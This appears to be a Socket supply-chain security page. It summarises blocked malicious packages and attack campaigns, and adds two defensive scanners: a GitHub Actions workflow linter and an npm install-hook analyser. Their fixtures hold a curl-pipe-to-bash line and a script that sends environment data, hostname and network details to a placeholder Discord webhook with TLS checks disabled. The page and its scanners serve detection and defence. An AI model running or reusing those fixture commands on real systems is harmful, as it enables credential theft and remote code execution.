The code contains potential security risks such as hard-coded file paths, subprocess.Popen usage, and the handling of untrusted data through PyArrow Plasma. It is essential to review and address these security concerns before using this code in a production environment.

leadingsystems/contao-merconis

dev-attribute-value-frontend-sorting

Live on composer

Blocked by Socket

Conclusion: The Merconis InstallerController exhibits high-risk characteristics due to the presence of an obfuscated eval payload that could execute arbitrary code, combined with remote content downloads and reconstructive file operations during installation. While some safeguards exist (MD5 hash checks, prepared statements in many paths), the obfuscated runtime code execution and reliance on external data/resources create substantial supply-chain and remote-code-execution risks. A secure review should decode the eval payload, verify its purpose, ensure all downloads are strictly authenticated and delivered over TLS with integrity checks, and replace any dynamic code execution and untrusted deserialization with safe, auditable alternatives.

capesolo

0.4.20

Live on pypi

Blocked by Socket

This module contains multiple high-risk behaviors consistent with tools intended to evade detection and modify system identity and state: changing MachineGuid/ProductId, modifying Office security and MRU entries, masking virtualization indicators, attempting system-level execution via psexec, and adding persistent routes. While not showing explicit data exfiltration or a remote backdoor in this fragment, the operations are commonly used by malware for persistence, anti-analysis, and anti-forensics. Treat this package as malicious or highly dangerous unless you have a verified, legitimate, documented use-case and strict controls.

github_chatops_extensions

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

github.com/weaveworks/weave

v0.11.1-0.20150527131451-84874b967678

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

354766/feiskyer/openclaw-kubernetes/claude-skill/

426dd532ac541acd3c3771f5da7fe9997462487a

Live on socket

Blocked by Socket

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

fray

3.5.109

Live on pypi

Blocked by Socket

This JSON is an explicit, weaponized catalog of HTTP request smuggling payloads and evasion techniques. It is high-risk: the payloads enable request smuggling, response queue poisoning, session/token capture, reflected XSS, and open-redirect attacks when sent to vulnerable HTTP stacks. The file is data-only (no active code), but its distribution or inclusion in broadly-available packages/tooling without strict access controls or clear authorization guidance poses a substantial security risk. Treat as offensive test material — permit only in controlled, authorized security-testing contexts and avoid bundling into production dependencies or public libraries.

harekrishnarai/flowlyt

32aeefd04ca1535dfdbd574c029270d484b37974

Live on actions

Blocked by Socket

This workflow is intentionally insecure and contains many clear supply-chain and CI/CD attack vectors: command injection (eval/exec/Invoke-Expression/pipe-to-bash), remote script execution (curl | bash), use of untrusted/typosquatted/unpinned actions, secrets passed to untrusted actions or printed, cross-repo access with tokens, and risky self-hosted privileged operations. It should not be used as-is in production. Mitigations include: never execute untrusted event data, avoid pull_request_target for running untrusted code, pin and verify actions, do not pass secrets to third-party or unverified actions, avoid curl|bash and running untrusted docker images privileged, and restrict self-hosted runners. Treat this workflow as malicious/insecure.
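The issue classes listed above can be checked mechanically. The following is an added example, not code from this page or from the flowlyt project: a small line-oriented linter that reads workflow YAML as text and flags unpinned actions, a pull_request_target job that checks out the PR head, event data expanded inside `run:` shell, curl-pipe-to-shell, dynamic eval, and secrets passed to unpinned actions or echoed to the log. Both workflows it scans are constructed for this example; the 40-hex action references in them are placeholders, not real commit SHAs.

```javascript
// Added example (not code from the Socket page or from the flowlyt project):
// a line-oriented linter for GitHub Actions workflow text that flags the issue
// classes listed above. It scans YAML lines directly with regexes, so it is a
// heuristic, not a parser; both workflows below are constructed for this example.

const SHA_PINNED = /@(?:[0-9a-f]{40}|sha256:[0-9a-f]{64})$/;
const isPinned = (ref) => SHA_PINNED.test(ref) || ref.startsWith('./'); // local actions need no pin

// Rules applied to each line of shell under a `run:` key.
const SHELL_RULES = [
  ['expression-injection', /\$\{\{\s*github\.event\./, 'event data expanded inside a shell command; pass it through an env var instead'],
  ['pipe-to-shell', /\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/, 'remote script piped straight into a shell'],
  ['dynamic-eval', /\b(?:eval|Invoke-Expression)\b/, 'string evaluated as code'],
  ['secret-printed', /^(?:echo|printf|cat)\b.*\$\{\{\s*secrets\./, 'secret written to the job log'],
];
const checkShell = (lineNo, shell, flag) => {
  for (const [id, re, msg] of SHELL_RULES) if (re.test(shell)) flag(lineNo, id, msg);
};

// Returns [{ line, id, msg }] for the given workflow text.
function scanWorkflow(text) {
  const findings = [];
  const flag = (line, id, msg) => findings.push({ line, id, msg });
  let privilegedTrigger = false; // workflow runs on pull_request_target
  let step = null;               // { uses, pinned, checkout } for the current step
  let runIndent = -1;            // indent of an open `run: |` block scalar, else -1

  text.split('\n').forEach((raw, i) => {
    const lineNo = i + 1;
    const t = raw.trim();
    if (t === '' || t.startsWith('#')) return;
    const indent = raw.length - raw.trimStart().length;
    if (runIndent >= 0 && indent <= runIndent) runIndent = -1; // block scalar ended
    if (runIndent >= 0) { checkShell(lineNo, t, flag); return; }

    const runM = t.match(/^(?:- )?run:\s*(.*)$/);
    if (runM) {
      if (/^[|>]/.test(runM[1])) runIndent = indent + (t.startsWith('- ') ? 2 : 0);
      else checkShell(lineNo, runM[1], flag);
      return;
    }
    if (/\bpull_request_target\b/.test(t)) privilegedTrigger = true;
    if (t.startsWith('- ')) step = { uses: null, pinned: true, checkout: false };

    const usesM = t.match(/^(?:- )?uses:\s*['"]?([^\s'"]+)/);
    if (usesM) {
      const ref = usesM[1];
      step = { uses: ref, pinned: isPinned(ref), checkout: privilegedTrigger && ref.startsWith('actions/checkout@') };
      if (!step.pinned) flag(lineNo, 'unpinned-action', `"${ref}" is not pinned to a commit SHA`);
      return;
    }
    if (step && step.checkout && /^ref:.*github\.event\.pull_request\.head\./.test(t)) {
      flag(lineNo, 'pwn-request', 'pull_request_target job checks out the PR head, so untrusted code runs with repository secrets');
    }
    if (step && !step.pinned && /\$\{\{\s*secrets\./.test(t)) {
      flag(lineNo, 'secret-to-unpinned-action', `secret passed to unpinned action "${step.uses}"`);
    }
  });
  return findings;
}

// Constructed insecure workflow; the 40-hex ref is a placeholder, not a real SHA.
const INSECURE_WORKFLOW = [
  'name: pr-triage',
  'on:',
  '  pull_request_target:',
  '    types: [opened]',
  'jobs:',
  '  triage:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - uses: actions/checkout@v4',
  '        with:',
  '          ref: ${{ github.event.pull_request.head.sha }}',
  '      - name: Greet',
  '        run: |',
  '          echo "Thanks for ${{ github.event.pull_request.title }}"',
  '          curl -sSL https://example.invalid/setup.sh | bash',
  '      - uses: some-org/publish-action@main',
  '        with:',
  '          token: ${{ secrets.NPM_TOKEN }}',
  '      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # placeholder SHA',
  '        with:',
  '          node-version: 20',
].join('\n');

// Constructed hardened version: pull_request trigger, SHA-pinned action,
// event data passed through an environment variable instead of the shell text.
const HARDENED_WORKFLOW = [
  'name: pr-triage',
  'on:',
  '  pull_request:',
  'jobs:',
  '  triage:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # placeholder SHA',
  '      - name: Greet',
  '        env:',
  '          PR_TITLE: ${{ github.event.pull_request.title }}',
  '        run: echo "Thanks for $PR_TITLE"',
].join('\n');

for (const f of scanWorkflow(INSECURE_WORKFLOW)) console.log(`line ${f.line}: ${f.id}: ${f.msg}`);
console.log(`hardened findings: ${scanWorkflow(HARDENED_WORKFLOW).length}`);
```

The hardened workflow passes because the PR title reaches the shell as `$PR_TITLE`, which the shell treats as data, whereas `${{ github.event.pull_request.title }}` is substituted into the script text before the shell runs it. A regex scanner like this cannot see multi-document YAML or anchors, so treat it as a first pass, not a replacement for a proper workflow linter.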

warnermedia-test

1.0.0

by m0chan-hackerone

Live on npm

Blocked by Socket

This install script performs active data exfiltration and network beaconing to an external domain, leaking local user and environment information. This behavior is malicious or at minimum highly suspicious telemetry/privacy-invasive activity and could be used for tracking, reconnaissance, or as part of a command-and-control mechanism. It should be treated as malware and blocked unless you fully trust and control the receiving domain and purpose.

lyte-dom

5.459.1

by hzoho

Removed from npm

Blocked by Socket

The code may be used for malicious purposes: it collects sensitive information (environment variables) and sends it to a potentially dangerous host, which could leak sensitive data.

Live on npm for 1 hour and 23 minutes before removal. Socket users were protected even while the package was live.

fsd

0.1.619

Removed from pypi

Blocked by Socket

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 5 hours and 56 minutes before removal. Socket users were protected even while the package was live.

hexstrike-ai

0.1.0

Removed from pypi

Blocked by Socket

This module is an active XXE exploitation tool designed to read local files from a target XML parser and to exfiltrate data via an out-of-band HTTP callback to a hardcoded attacker-controlled domain. It is offensive in nature and poses a high security risk if used without authorization. Use only in authorized penetration tests with explicit permission; otherwise treat the tool as malicious. Remediation for targets: disable external entity resolution, use secure XML parsers that disallow DTDs/entities, apply input validation, and block outbound HTTP to untrusted destinations.

Live on pypi for 14 days, 18 hours and 42 minutes before removal. Socket users were protected even while the package was live.

@nexthink/remote-action-widgets

1.11.6

by nxt-fmiquel

Removed from npm

Blocked by Socket

The script collects environment variables, hostname, package name, and network interface information, and sends it to a remote server. Although the comment claims no harmful code is executed, this can still lead to information leakage.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

@radancy/dropr-client

99.0.0

by radancy

Live on npm

Blocked by Socket

This file collects system details (such as hostname, user account, platform, and domain information) and transmits them to the remote domain bugbounty[.]click. It disables TLS certificate validation (NODE_TLS_REJECT_UNAUTHORIZED=0), enabling potential man-in-the-middle attacks. This behavior equates to data exfiltration and represents a severe security risk.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

Unstable ownership

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Read the blog

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

View all integrations

RUST

crates.io

Rust Package Manager

PHP

Packagist

PHP Package Manager

GOLANG

Go Modules

Go Dependency Management

JAVA

Maven Central

JAVASCRIPT

npm

Node Package Manager

.NET

NuGet

.NET Package Manager

PYTHON

PyPI

Python Package Index

RUBY

RubyGems.org

Ruby Package Manager

SWIFT

Swift

AI

Hugging Face Hub

AI Model Hub

CI

GitHub Actions

CI/CD Workflows

EXTENSIONS

Chrome Web Store

Chrome Browser Extensions

EXTENSIONS

Open VSX

VS Code Extensions

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published, roughly one every two minutes, from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified; some of their descriptions mention a capture-the-flag challenge or a test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
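The install-time collection-and-exfiltration behavior described here, and in the npm alerts earlier on this page (environment variables, hostname and network interfaces sent to a remote server; TLS validation disabled with NODE_TLS_REJECT_UNAUTHORIZED=0), leaves static markers in a package's lifecycle scripts. The following is an added example, not Socket's scanner and not code from any package described here: it resolves what each npm install hook runs and grades the result by the combination of data-collection, outbound-network, exec and stealth signals it finds. The signal list is a regex heuristic, and the package.json and script file it scans are constructed, inert fixtures written for this example (the webhook path in the fixture is a placeholder).

```javascript
// Added example (not code from the Socket page or from any package it describes).
// Static triage of an npm package's lifecycle scripts: resolve what each
// install hook runs, then look for the data-collection, outbound-network and
// stealth markers the alerts above describe. Signals are regex heuristics;
// the package.json and script files below are constructed, inert fixtures.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

const SIGNALS = [
  { id: 'hostname',           kind: 'collect', re: /\bhostname\s*\(/ },
  { id: 'network-interfaces', kind: 'collect', re: /\bnetworkInterfaces\s*\(/ },
  { id: 'user-info',          kind: 'collect', re: /\buserInfo\s*\(|\bhomedir\s*\(/ },
  { id: 'dns-servers',        kind: 'collect', re: /\bgetServers\s*\(/ },
  { id: 'env-dump',           kind: 'collect', re: /\bprocess\.env\b(?![.\[])/ }, // whole environment, not one variable
  { id: 'public-ip-lookup',   kind: 'collect', re: /api\.ipify\.org|ip-api\.com|ifconfig\.me/ },
  { id: 'outbound-request',   kind: 'network', re: /\bhttps?\.request\s*\(|\bfetch\s*\(|\baxios\b|\bnet\.connect\s*\(/ },
  { id: 'discord-webhook',    kind: 'network', re: /discord(?:app)?\.com\/api\/webhooks\// },
  { id: 'tls-disabled',       kind: 'network', re: /NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['"]?0|rejectUnauthorized\s*:\s*false/ },
  { id: 'spawns-process',     kind: 'exec',    re: /\bchild_process\b|\bexecSync\s*\(|\bspawnSync?\s*\(/ },
  { id: 'dynamic-eval',       kind: 'exec',    re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'swallowed-errors',   kind: 'stealth', re: /catch\s*(?:\(\s*\w*\s*\))?\s*\{\s*\}|\.on\(\s*['"]error['"]\s*,\s*(?:\(\s*\w*\s*\)|\w+)\s*=>\s*\{\s*\}/ },
  { id: 'silenced-output',    kind: 'stealth', re: /stdio\s*:\s*['"]ignore['"]|>\s*\/dev\/null\s+2>&1/ },
  { id: 'obfuscated-string',  kind: 'stealth', re: /(?:\\x[0-9a-fA-F]{2}){8,}|['"][A-Za-z0-9+\/]{200,}={0,2}['"]/ },
];

// The text a hook actually executes: the command itself plus any script files
// it names that are present in `files` ({ path: contents }).
function hookBody(command, files) {
  const refs = command.match(/[\w./-]+\.(?:js|cjs|mjs|sh)\b/g) || [];
  const parts = [command];
  for (const ref of refs) {
    const path = ref.replace(/^\.\//, '');
    if (files[path] !== undefined) parts.push(files[path]);
  }
  return parts.join('\n');
}

// Collection plus a network sink is the exfiltration pattern; exec plus a
// network sink is the dropper pattern; a bare hook is only worth a note.
function classify(signalIds) {
  const kinds = new Set(signalIds.map((id) => SIGNALS.find((s) => s.id === id).kind));
  if (kinds.has('network') && kinds.has('collect')) return { verdict: 'exfiltration', severity: 'high' };
  if (kinds.has('network') && kinds.has('exec')) return { verdict: 'dropper', severity: 'high' };
  if (kinds.has('network')) return { verdict: 'beacon', severity: 'medium' };
  if (kinds.size > 0) return { verdict: 'suspicious-hook', severity: 'medium' };
  return { verdict: 'lifecycle-hook', severity: 'low' };
}

// Returns one finding per lifecycle hook defined in package.json.
function scanPackage(packageJson, files) {
  const scripts = packageJson.scripts || {};
  return LIFECYCLE_HOOKS.filter((hook) => scripts[hook]).map((hook) => {
    const body = hookBody(scripts[hook], files);
    const signals = SIGNALS.filter((s) => s.re.test(body)).map((s) => s.id);
    return { name: packageJson.name, hook, command: scripts[hook], signals, ...classify(signals) };
  });
}

// Constructed fixture modelled on the alerts above; it is data here and is never executed.
const SUSPECT_PACKAGE = { name: 'suspect-pkg', version: '1.0.0', scripts: { postinstall: 'node scripts/setup.js', test: 'jest' } };
const SUSPECT_FILES = {
  'scripts/setup.js': [
    "const os = require('os');",
    "const https = require('https');",
    "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
    "const info = { host: os.hostname(), ifaces: os.networkInterfaces(), user: os.userInfo().username, env: process.env };",
    "const req = https.request('https://discord.com/api/webhooks/0/placeholder', { method: 'POST' }, () => {});",
    "req.on('error', () => {});",
    "req.end(JSON.stringify(info));",
  ].join('\n'),
};
// Constructed benign fixture: a native build step with no script file of its own.
const BENIGN_PACKAGE = { name: 'native-addon', version: '2.0.0', scripts: { install: 'node-gyp rebuild' } };

for (const pkg of [[SUSPECT_PACKAGE, SUSPECT_FILES], [BENIGN_PACKAGE, {}]]) {
  for (const finding of scanPackage(...pkg)) console.log(JSON.stringify(finding));
}
```

Grading on the combination of signal kinds, rather than on any single regex, keeps benign native builds (`node-gyp rebuild`) at the low tier while a script that both reads `os.networkInterfaces()` and posts to a webhook lands at the top. A scanner like this reads only what the hook names on the command line, so an obfuscated loader that fetches and executes a second stage at install time surfaces as `beacon` or `dropper` rather than `exfiltration`, which is still a blocking verdict.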

Ready to dive in?

Get protected by Socket with just 2 clicks.


The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles